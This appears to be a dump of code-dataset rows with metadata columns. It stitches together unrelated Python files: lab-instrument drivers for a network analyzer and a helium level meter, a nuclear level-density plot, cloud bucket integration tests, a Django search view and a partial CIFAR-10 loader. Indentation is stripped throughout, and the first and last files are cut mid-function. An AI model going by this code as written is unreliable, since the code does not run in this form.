self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
self.zvl.remove_allmarker(1)
# second screenshot
marker_lst = markerlist[10:20]
markern = 1
self.set_edge(1700, 3000)
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern)
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_2.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
self.zvl.remove_allmarker(1)
# third screenshot
marker_lst = markerlist[20:]
markern = 1
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern)
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_3.PNG'.format(temp,dl_ul))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
except Exception as e:
logger.error(e)
finally:
# logger.debug(markery_list)
ret = ['%.2f' % (float(item) + self.offset) for item in markery_list]
return ret
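A minimal usage sketch for HandleZVL above (not part of the original file): it assumes a reachable R&S ZVL analyzer and the commoninterface.zvlbase dependency; the IP address, offset, screenshot path and frequencies are invented.
handler = HandleZVL('192.168.1.100', offset=0.5)
handler.init_zvl('/tmp/zvl/run1.png')                 # screenshots are written to the directory of this path
gains = handler.get_gain(960, 947.5, 935)             # gain at high/mid/low points (MHz) plus in-band ripple
vswr = handler.get_vswr(960, 947.5, 935, 'DL', 25)    # max VSWR marker; also saves a screenshot
handler.close_zvl()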
| 34.830097
| 108
| 0.557073
| 879
| 7,175
| 4.386803
| 0.202503
| 0.058091
| 0.073911
| 0.032676
| 0.486515
| 0.432313
| 0.392894
| 0.280083
| 0.256743
| 0.225104
| 0
| 0.043612
| 0.319303
| 7,175
| 205
| 109
| 35
| 0.745905
| 0.106481
| 0
| 0.414286
| 0
| 0
| 0.058075
| 0.011256
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078571
| false
| 0
| 0.021429
| 0
| 0.192857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5a25378e13e098be2b1cdb76f7062e2c91b9b5
| 2,410
|
py
|
Python
|
kshell/partial_level_density.py
|
ErlendLima/70Zn
|
1bf73adec5a3960e195788bc1f4bc79b2086be64
|
[
"MIT"
] | null | null | null |
kshell/partial_level_density.py
|
ErlendLima/70Zn
|
1bf73adec5a3960e195788bc1f4bc79b2086be64
|
[
"MIT"
] | null | null | null |
kshell/partial_level_density.py
|
ErlendLima/70Zn
|
1bf73adec5a3960e195788bc1f4bc79b2086be64
|
[
"MIT"
] | null | null | null |
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import shellmodelutilities as smutil
# Set bin width and range
bin_width = 0.20
Emax = 14
Nbins = int(np.ceil(Emax/bin_width))
Emax_adjusted = bin_width*Nbins # Trick to get an integer number of bins
bins = np.linspace(0,Emax_adjusted,Nbins+1)
# Define list of calculation input files and corresponding label names
inputfile = "summary_Zn70_jun45.txt"
# Instantiate figure which we will fill
f_rho, ax_rho = plt.subplots(1,1)
# Read energy levels from file
levels = smutil.read_energy_levels(inputfile)
# Choose which [2*J,pi] combinations to include in partial level density plot
Jpi_list = [[0,-1],[2,-1],[4,-1],[6,-1],[8,-1],[10,-1],[12,-1],[14,-1],[16,-1],[18,-1],[20,-1],[22,-1],[24,-1],[26,-1],[28,-1],
[0,+1],[2,+1],[4,+1],[6,+1],[8,+1],[10,+1],[12,+1],[14,+1],[16,+1],[18,+1],[20,+1],[22,+1],[24,+1],[26,+1],[28,+1]]
# Allocate (Ex,Jpi) matrix to store partial level density
rho_ExJpi = np.zeros((Nbins,len(Jpi_list)))
# Count number of levels for each (Ex, J, pi) pixel.
Egs = levels[0,0] # Ground state energy
for i_l in range(len(levels[:,0])):
E, J, pi = levels[i_l]
# Skip if level is outside range:
if E-Egs >= Emax:
continue
i_Ex = int(np.floor((E-Egs)/bin_width))
try:
i_Jpi = Jpi_list.index([J,pi])
except:
continue
rho_ExJpi[i_Ex,i_Jpi] += 1
rho_ExJpi /= bin_width # Normalize to bin width, to get density in MeV^-1
# Plot it
from matplotlib.colors import LogNorm # To get log scaling on the z axis
colorbar_object = ax_rho.pcolormesh(np.linspace(0,len(Jpi_list)-1,len(Jpi_list)), bins, rho_ExJpi, norm=LogNorm())
f_rho.colorbar(colorbar_object) # Add colorbar to plot
# Make the plot nice
ax_rho.set_xlabel(r"$\pi\cdot J\,\mathrm{(\hbar)}$")
ax_rho.set_ylabel(r'$E_x \, \mathrm{(MeV)}$')
# A bit of Python voodoo to get the x labels right:
Jpi_array = np.append(np.linspace(0,-int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2)),np.linspace(0,int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2))) # Array of pi*J for plot
def format_func(value, tick_number):
if value >= 0 and value <= 28:
return int(Jpi_array[int(value)])
else:
return None
ax_rho.set_xlim([0,29])
ax_rho.xaxis.set_major_formatter(plt.FuncFormatter(format_func))
ax_rho.set_xticks([0,2,4,6,8,10,12,14,15,17,19,21,23,25,27])
# Show plot
plt.show()
| 34.927536
| 170
| 0.674274
| 446
| 2,410
| 3.515695
| 0.374439
| 0.040179
| 0.044643
| 0.033163
| 0.102041
| 0.102041
| 0.102041
| 0.102041
| 0.102041
| 0.102041
| 0
| 0.068226
| 0.148548
| 2,410
| 68
| 171
| 35.441176
| 0.695906
| 0.26805
| 0
| 0.047619
| 0
| 0
| 0.04298
| 0.012607
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.119048
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5b20986b78369a49dfb31999fcc5213f36f3e2
| 15,480
|
py
|
Python
|
tests/integration/test_provider_base.py
|
neuro-inc/platform-buckets-api
|
ba04edeb8565fa06e5af6d0316957a8816b087b2
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_provider_base.py
|
neuro-inc/platform-buckets-api
|
ba04edeb8565fa06e5af6d0316957a8816b087b2
|
[
"Apache-2.0"
] | 55
|
2021-11-16T00:26:52.000Z
|
2022-03-29T03:16:55.000Z
|
tests/integration/test_provider_base.py
|
neuro-inc/platform-buckets-api
|
ba04edeb8565fa06e5af6d0316957a8816b087b2
|
[
"Apache-2.0"
] | null | null | null |
import abc
import secrets
from collections.abc import AsyncIterator, Awaitable, Callable, Mapping
from contextlib import AbstractAsyncContextManager, asynccontextmanager
from dataclasses import dataclass
from datetime import datetime, timezone
import pytest
from aiohttp import ClientSession
from yarl import URL
from platform_buckets_api.providers import (
BucketExistsError,
BucketNotExistsError,
BucketPermission,
BucketProvider,
RoleExistsError,
UserBucketOperations,
)
from platform_buckets_api.storage import ImportedBucket, ProviderBucket
BUCKET_NAME_PREFIX = "integration-tests-"
ROLE_NAME_PREFIX = "integration-tests-"
def _make_bucket_name() -> str:
return BUCKET_NAME_PREFIX + secrets.token_hex(5)
def _make_role_name() -> str:
return ROLE_NAME_PREFIX + secrets.token_hex(5)
class BasicBucketClient(abc.ABC):
@abc.abstractmethod
async def put_object(self, key: str, data: bytes) -> None:
pass
@abc.abstractmethod
async def read_object(self, key: str) -> bytes:
pass
@abc.abstractmethod
async def list_objects(self) -> list[str]:
pass
@abc.abstractmethod
async def delete_object(self, key: str) -> None:
pass
@dataclass()
class ProviderTestOption:
type: str
provider: BucketProvider
bucket_exists: Callable[[str], Awaitable[bool]]
make_client: Callable[
[ProviderBucket, Mapping[str, str]],
AbstractAsyncContextManager[BasicBucketClient],
]
get_admin: Callable[
[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]
]
role_exists: Callable[[str], Awaitable[bool]]
get_public_url: Callable[[str, str], URL]
credentials_for_imported: Mapping[str, str]
def as_admin_cm(
creator_func: Callable[[ProviderBucket], BasicBucketClient]
) -> Callable[[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]]:
@asynccontextmanager
async def creator(bucket: ProviderBucket) -> AsyncIterator[BasicBucketClient]:
yield creator_func(bucket)
return creator
# Access checkers
async def _test_no_access(
admin_client: BasicBucketClient,
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = secrets.token_hex(8)
with pytest.raises(Exception):
await user_client.put_object(key, data)
await admin_client.put_object(key, data)
with pytest.raises(Exception):
await user_client.read_object(key)
with pytest.raises(Exception):
await user_client.list_objects()
with pytest.raises(Exception):
await user_client.delete_object(key)
async def _test_read_access(
admin_client: BasicBucketClient,
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = "foo"
with pytest.raises(Exception):
await user_client.put_object(key, data)
await admin_client.put_object(key, data)
assert await user_client.read_object(key) == data
assert key in await user_client.list_objects()
with pytest.raises(Exception):
await user_client.delete_object(key)
async def _test_write_access(
user_client: BasicBucketClient,
) -> None:
data = b"\x01" * 1024
key = "foo"
await user_client.put_object(key, data)
assert await user_client.read_object(key) == data
assert key in await user_client.list_objects()
await user_client.delete_object(key)
assert key not in await user_client.list_objects()
class TestProviderBase:
__test__ = False
async def test_bucket_create(self, provider_option: ProviderTestOption) -> None:
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
assert bucket.name == name
assert await provider_option.bucket_exists(name)
async def test_bucket_duplicate_create(
self,
provider_option: ProviderTestOption,
) -> None:
name = _make_bucket_name()
await provider_option.provider.create_bucket(name)
with pytest.raises(BucketExistsError):
await provider_option.provider.create_bucket(name)
async def test_bucket_delete(self, provider_option: ProviderTestOption) -> None:
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
await provider_option.provider.delete_bucket(bucket.name)
assert not await provider_option.bucket_exists(name)
async def test_bucket_delete_unknown(
self, provider_option: ProviderTestOption
) -> None:
with pytest.raises(BucketNotExistsError):
await provider_option.provider.delete_bucket(_make_bucket_name())
async def test_bucket_credentials_write_access(
self, provider_option: ProviderTestOption
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
credentials = await provider_option.provider.get_bucket_credentials(
bucket, write=True, requester="testing"
)
async with provider_option.make_client(bucket, credentials) as user_client:
await _test_write_access(user_client)
async def test_bucket_credentials_read_access(
self, provider_option: ProviderTestOption
) -> None:
return
if provider_option.type == "aws":
pytest.skip("Moto do not support embedding policies into token")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
credentials = await provider_option.provider.get_bucket_credentials(
bucket, write=False, requester="testing"
)
async with provider_option.make_client(
bucket, credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
async def test_signed_url_for_blob(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto fails for signed url with 500")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("foo/bar", b"test data")
url = await provider_option.provider.sign_url_for_blob(bucket, "foo/bar")
async with ClientSession() as session:
async with session.get(url) as resp:
data = await resp.read()
assert data == b"test data"
async def test_public_access_to_bucket(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto has bad support of this operation")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("blob1", b"blob data 1")
await admin_client.put_object("blob2", b"blob data 2")
await provider_option.provider.set_public_access(bucket.name, True)
async with ClientSession() as session:
url = provider_option.get_public_url(bucket.name, "blob1")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 1"
url = provider_option.get_public_url(bucket.name, "blob2")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 2"
async def test_bucket_make_public_for_imported_bucket(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto fails with 500")
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("blob1", b"blob data 1")
await admin_client.put_object("blob2", b"blob data 2")
async with UserBucketOperations.get_for_imported_bucket(
ImportedBucket(
id="not-important",
created_at=datetime.now(timezone.utc),
owner="user",
name="not-important",
org_name=None,
public=False,
provider_bucket=bucket,
credentials=provider_option.credentials_for_imported,
)
) as operations:
await operations.set_public_access(bucket.name, True)
async with ClientSession() as session:
url = provider_option.get_public_url(bucket.name, "blob1")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 1"
url = provider_option.get_public_url(bucket.name, "blob2")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 2"
@pytest.fixture()
async def sample_role_permissions(
self, provider_option: ProviderTestOption
) -> list[BucketPermission]:
bucket_name = _make_bucket_name()
await provider_option.provider.create_bucket(bucket_name)
return [
BucketPermission(
bucket_name=bucket_name,
write=True,
)
]
async def test_role_create(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
role = await provider_option.provider.create_role(name, sample_role_permissions)
assert name in role.name
assert await provider_option.role_exists(role.name)
async def test_role_create_multiple(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name1, name2 = _make_role_name(), _make_role_name()
role1 = await provider_option.provider.create_role(
name1, sample_role_permissions
)
role2 = await provider_option.provider.create_role(
name2, sample_role_permissions
)
assert await provider_option.role_exists(role1.name)
assert await provider_option.role_exists(role2.name)
async def test_role_duplicate(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
await provider_option.provider.create_role(name, sample_role_permissions)
with pytest.raises(RoleExistsError):
await provider_option.provider.create_role(name, sample_role_permissions)
async def test_role_delete(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
role = await provider_option.provider.create_role(name, sample_role_permissions)
await provider_option.provider.delete_role(role)
assert not await provider_option.role_exists(role.name)
async def test_role_grant_bucket_write_access(
self,
provider_option: ProviderTestOption,
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(bucket, role.credentials) as user_client:
await _test_write_access(user_client)
async def test_role_grant_bucket_read_only_access(
self,
provider_option: ProviderTestOption,
) -> None:
return
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=False,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
async def test_role_grant_access_multiple_buckets(
self,
provider_option: ProviderTestOption,
) -> None:
if provider_option.type == "azure":
pytest.skip("Azure provider do not support multiple buckets roles")
bucket1 = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket1.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(
bucket1, role.credentials
) as user_client:
await _test_write_access(user_client)
bucket2 = await provider_option.provider.create_bucket(_make_bucket_name())
await provider_option.provider.set_role_permissions(
role,
[
BucketPermission(
bucket_name=bucket1.name,
write=True,
),
BucketPermission(
bucket_name=bucket2.name,
write=True,
),
],
)
async with provider_option.make_client(
bucket1, role.credentials
) as user_client:
await _test_write_access(user_client)
async with provider_option.make_client(
bucket2, role.credentials
) as user_client:
await _test_write_access(user_client)
async def test_role_downgrade_access(
self,
provider_option: ProviderTestOption,
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(bucket, role.credentials) as user_client:
await _test_write_access(user_client)
await provider_option.provider.set_role_permissions(
role,
[
BucketPermission(
bucket_name=bucket.name,
write=False,
),
],
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
await provider_option.provider.set_role_permissions(
role,
[],
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_no_access(admin, user_client)
| 35.022624
| 88
| 0.655749
| 1,686
| 15,480
| 5.734282
| 0.094306
| 0.124535
| 0.080575
| 0.097745
| 0.738519
| 0.695801
| 0.6536
| 0.618225
| 0.609433
| 0.597745
| 0
| 0.005208
| 0.268152
| 15,480
| 441
| 89
| 35.102041
| 0.848177
| 0.000969
| 0
| 0.577128
| 0
| 0
| 0.030201
| 0
| 0
| 0
| 0
| 0
| 0.047872
| 1
| 0.007979
| false
| 0.010638
| 0.047872
| 0.005319
| 0.103723
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5bf9f4fe33b1e74de5e5a8a91381afcd0d937c
| 576
|
py
|
Python
|
appserver/search/views.py
|
sinag/SWE574-Horuscope
|
9725dd356cbfd19f0ce88d4a208c872be765bd88
|
[
"MIT"
] | null | null | null |
appserver/search/views.py
|
sinag/SWE574-Horuscope
|
9725dd356cbfd19f0ce88d4a208c872be765bd88
|
[
"MIT"
] | null | null | null |
appserver/search/views.py
|
sinag/SWE574-Horuscope
|
9725dd356cbfd19f0ce88d4a208c872be765bd88
|
[
"MIT"
] | 1
|
2020-08-07T12:54:51.000Z
|
2020-08-07T12:54:51.000Z
|
from django.http import HttpResponse
from django.shortcuts import render, redirect
from community.models import Community
# Create your views here.
def search_basic(request):
communities = None
if request.POST:
community_query = request.POST.get('community_search', False)
communities = Community.objects.filter(city__icontains=community_query)
print(communities)
return render(request, 'search/search_basic.html', {'communities': communities})
return render(request, 'search/search_basic.html', {'communities': communities})
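A minimal wiring sketch for the view above (not part of the original file): the URL pattern and route name are invented for illustration.
from django.urls import path
from search import views
urlpatterns = [
    path('search/', views.search_basic, name='search_basic'),
]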
| 30.315789
| 88
| 0.744792
| 65
| 576
| 6.476923
| 0.492308
| 0.078385
| 0.109264
| 0.142518
| 0.320665
| 0.320665
| 0.320665
| 0.320665
| 0.320665
| 0.320665
| 0
| 0
| 0.161458
| 576
| 18
| 89
| 32
| 0.871636
| 0.039931
| 0
| 0.181818
| 0
| 0
| 0.156934
| 0.087591
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0
| 0.545455
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5c97158341c4d0d209389c3a2affb30b2d34bf
| 9,772
|
py
|
Python
|
qcodes_contrib_drivers/drivers/Oxford/ILM200.py
|
jenshnielsen/Qcodes_contrib_drivers
|
dc878cdd99a62f4643a62163a3a6341f98cee440
|
[
"MIT"
] | null | null | null |
qcodes_contrib_drivers/drivers/Oxford/ILM200.py
|
jenshnielsen/Qcodes_contrib_drivers
|
dc878cdd99a62f4643a62163a3a6341f98cee440
|
[
"MIT"
] | 2
|
2020-05-29T11:00:52.000Z
|
2020-10-09T06:18:11.000Z
|
qcodes_contrib_drivers/drivers/Oxford/ILM200.py
|
jenshnielsen/Qcodes_contrib_drivers
|
dc878cdd99a62f4643a62163a3a6341f98cee440
|
[
"MIT"
] | 1
|
2020-04-24T01:15:44.000Z
|
2020-04-24T01:15:44.000Z
|
# OxfordInstruments_ILM200.py class, to perform the communication between the Wrapper and the device
# Copyright (c) 2017 QuTech (Delft)
# Code is available under the available under the `MIT open-source license <https://opensource.org/licenses/MIT>`__
#
# Pieter Eendebak <pieter.eendebak@tno.nl>, 2017
# Takafumi Fujita <t.fujita@tudelft.nl>, 2016
# Guenevere Prawiroatmodjo <guen@vvtp.tudelft.nl>, 2009
# Pieter de Groot <pieterdegroot@gmail.com>, 2009
from time import sleep
import visa
import logging
from qcodes import VisaInstrument
class OxfordInstruments_ILM200(VisaInstrument):
"""
This is the qcodes driver for the Oxford Instruments ILM 200 Helium Level Meter.
Usage:
Initialize with
<name> = instruments.create('name', 'OxfordInstruments_ILM200', address='<Instrument address>')
<Instrument address> = ASRL4::INSTR
Note: Since the ISOBUS allows for several instruments to be managed in parallel, the command
which is sent to the device starts with '@n', where n is the ISOBUS instrument number.
"""
def __init__(self, name, address, number=1, **kwargs):
"""
Initializes the Oxford Instruments ILM 200 Helium Level Meter.
Args:
name (str): name of the instrument
address (str): instrument address
number (int): ISOBUS instrument number (number=1 is specific to the ILM in F008)
Returns:
None
"""
logging.debug(__name__ + ' : Initializing instrument')
super().__init__(name, address, **kwargs)
self.visa_handle.set_visa_attribute(visa.constants.VI_ATTR_ASRL_STOP_BITS,
visa.constants.VI_ASRL_STOP_TWO)
self._address = address
self._number = number
self._values = {}
self.add_parameter('level',
label='level',
get_cmd=self._do_get_level,
unit='%')
self.add_parameter('status',
get_cmd=self._do_get_status)
self.add_parameter('rate',
get_cmd=self._do_get_rate,
set_cmd=self._do_set_rate)
# a dummy command to avoid the initial error
try:
self.get_idn()
sleep(70e-3) # wait for the device to be able to respond
self._read() # to flush the buffer
except Exception as ex:
logging.debug(ex)
def _execute(self, message):
"""
Write a command to the device and read answer. This function writes to
the buffer by adding the device number at the front, instead of 'ask'.
Args:
message (str) : write command for the device
Returns:
None
"""
logging.info(
__name__ + ' : Send the following command to the device: %s' % message)
self.visa_handle.write('@%s%s' % (self._number, message))
sleep(70e-3) # wait for the device to be able to respond
result = self._read()
if result.find('?') >= 0:
print("Error: Command %s not recognized" % message)
else:
return result
def _read(self):
"""
Reads the total bytes in the buffer and outputs as a string.
Args:
None
Returns:
message (str)
"""
# because protocol has no termination chars the read reads the number
# of bytes in the buffer
bytes_in_buffer = self.visa_handle.bytes_in_buffer
# a workaround for a timeout error in the pyvsia read_raw() function
with(self.visa_handle.ignore_warning(visa.constants.VI_SUCCESS_MAX_CNT)):
mes = self.visa_handle.visalib.read(
self.visa_handle.session, bytes_in_buffer)
# cannot be done on same line for some reason
mes = str(mes[0].decode())
return mes
def get_idn(self):
"""
Overrides the function of Instrument since ILM does not support `*IDN?`
This string is supposed to be a
comma-separated list of vendor, model, serial, and firmware, but
semicolon and colon are also common separators so we accept them here
as well.
Returns:
A dict containing vendor, model, serial, and firmware.
"""
try:
idstr = '' # in case self.ask fails
idstr = self._get_version().split()
# form is supposed to be comma-separated, but we've seen
# other separators occasionally
idparts = [idstr[3] + ' ' + idstr[4], idstr[0], idstr[5],
idstr[1] + ' ' + idstr[2]]
# in case parts at the end are missing, fill in None
if len(idparts) < 4:
idparts += [None] * (4 - len(idparts))
except Exception as ex:
logging.warn('Error getting or interpreting *IDN?: ' + repr(idstr))
logging.debug(ex)
idparts = [None, None, None, None]
return dict(zip(('vendor', 'model', 'serial', 'firmware'), idparts))
def get_all(self):
"""
Reads all implemented parameters from the instrument,
and updates the wrapper.
"""
logging.info(__name__ + ' : reading all settings from instrument')
self.level.get()
self.status.get()
self.rate.get()
def close(self):
"""
Safely close connection
"""
logging.info(__name__ + ' : Closing ILM200 connection')
self.local()
super().close()
# Functions: Monitor commands
def _get_version(self):
"""
Identify the device
Args:
None
Returns:
identification (str): should be 'ILM200 Version 1.08 (c) OXFORD 1994\r'
"""
logging.info(__name__ + ' : Identify the device')
return self._execute('V')
def _do_get_level(self):
"""
Get Helium level of channel 1.
Args:
None
Returns:
result (float) : Helium level
"""
logging.info(__name__ + ' : Read level of channel 1')
result = self._execute('R1')
return float(result.replace("R", "")) / 10
def _do_get_status(self):
"""
Get status of the device.
"""
logging.info(__name__ + ' : Get status of the device.')
result = self._execute('X')
usage = {
0: "Channel not in use",
1: "Channel used for Nitrogen level",
2: "Channel used for Helium Level (Normal pulsed operation)",
3: "Channel used for Helium Level (Continuous measurement)",
9: "Error on channel (Usually means probe unplugged)"
}
# current_flowing = {
# 0 : "Curent not flowing in Helium Probe Wire",
# 1 : "Curent not flowing in Helium Probe Wire"
# }
# auto_fill_status = {
# 00 : "End Fill (Level > FULL)",
# 01 : "Not Filling (Level < FULL, Level > FILL)",
# 10 : "Filling (Level < FULL, Level > FILL)",
# 11 : "Start Filling (Level < FILL)"
# }
return usage.get(int(result[1]), "Unknown")
def _do_get_rate(self):
"""
Get helium meter channel 1 probe rate
Input:
None
Output:
rate(int) :
0 : "SLOW"
1 : "FAST"
"""
rate = {
1: "1 : Helium Probe in FAST rate",
0: "0 : Helium Probe in SLOW rate"
}
result = self._execute('X')
return rate.get(int(format(int(result[5:7]), '08b')[6]), "Unknown")
def remote(self):
"""
Set control to remote & locked
"""
logging.info(__name__ + ' : Set control to remote & locked')
self.set_remote_status(1)
def local(self):
"""
Set control to local & locked
"""
logging.info(__name__ + ' : Set control to local & locked')
self.set_remote_status(0)
def set_remote_status(self, mode):
"""
Set remote control status.
Args:
mode(int) :
0 : "Local and locked",
1 : "Remote and locked",
2 : "Local and unlocked",
3 : "Remote and unlocked",
Returns:
None
"""
status = {
0: "Local and locked",
1: "Remote and locked",
2: "Local and unlocked",
3: "Remote and unlocked",
}
logging.info(__name__ + ' : Setting remote control status to %s' %
status.get(mode, "Unknown"))
self._execute('C%s' % mode)
# Functions: Control commands (only recognised when in REMOTE control)
def set_to_slow(self):
"""
Set helium meter channel 1 to slow mode.
"""
self.set_remote_status(1)
logging.info(__name__ + ' : Setting Helium Probe in SLOW rate')
self._execute('S1')
self.set_remote_status(3)
def set_to_fast(self):
"""
Set helium meter channel 1 to fast mode.
"""
self.set_remote_status(1)
logging.info(__name__ + ' : Setting Helium Probe in FAST rate')
self._execute('T1')
self.set_remote_status(3)
def _do_set_rate(self, rate):
"""
Set helium meter channel 1 probe rate
Args:
rate(int) :
0 : "SLOW"
1 : "FAST"
"""
self.set_remote_status(1)
if rate == 0:
self.set_to_slow()
elif rate == 1:
self.set_to_fast()
self.set_remote_status(3)
logging.info(self._do_get_rate())
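A minimal usage sketch for the driver above (not part of the original file): it assumes a connected ILM 200 reachable at the VISA address from the class docstring, with the default ISOBUS number.
ilm = OxfordInstruments_ILM200('ilm', 'ASRL4::INSTR', number=1)
print(ilm.level.get())    # helium level in %
print(ilm.status.get())   # channel usage description
ilm.rate.set(1)           # switch the probe to FAST rate
ilm.close()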
| 32.144737
| 115
| 0.556283
| 1,147
| 9,772
| 4.589364
| 0.28422
| 0.018617
| 0.031345
| 0.028875
| 0.237652
| 0.140957
| 0.115122
| 0.079407
| 0.06345
| 0.06345
| 0
| 0.019994
| 0.344863
| 9,772
| 303
| 116
| 32.250825
| 0.802249
| 0.360827
| 0
| 0.134921
| 0
| 0
| 0.163254
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126984
| false
| 0
| 0.031746
| 0
| 0.222222
| 0.007937
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5cdd0275ff0c38add8e228ff02333ee397a98c
| 4,417
|
py
|
Python
|
load_cifar_10.py
|
xgxofdream/CNN-Using-Local-CIFAR-10-dataset
|
8076056da58a5b564ded50f4cdb059585deb900d
|
[
"Apache-2.0"
] | null | null | null |
load_cifar_10.py
|
xgxofdream/CNN-Using-Local-CIFAR-10-dataset
|
8076056da58a5b564ded50f4cdb059585deb900d
|
[
"Apache-2.0"
] | null | null | null |
load_cifar_10.py
|
xgxofdream/CNN-Using-Local-CIFAR-10-dataset
|
8076056da58a5b564ded50f4cdb059585deb900d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import pickle
"""
The CIFAR-10 dataset consists of 60000 32x32 colour images in 10 classes, with 6000 images per class. There are 50000
training images and 10000 test images.
The dataset is divided into five training batches and one test batch, each with 10000 images. The test batch contains
exactly 1000 randomly-selected images from each class. The training batches contain the remaining images in random
order, but some training batches may contain more images from one class than another. Between them, the training
batches contain exactly 5000 images from each class.
"""
def unpickle(file):
"""load the cifar-10 data"""
with open(file, 'rb') as fo:
data = pickle.load(fo, encoding='bytes')
return data
def load_cifar_10_data(data_dir, negatives=False):
"""
Return train_data, train_filenames, train_labels, test_data, test_filenames, test_labels
"""
# get the meta_data_dict
# num_cases_per_batch: 1000
# label_names: ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
# num_vis: :3072
meta_data_dict = unpickle(data_dir + "/batches.meta")
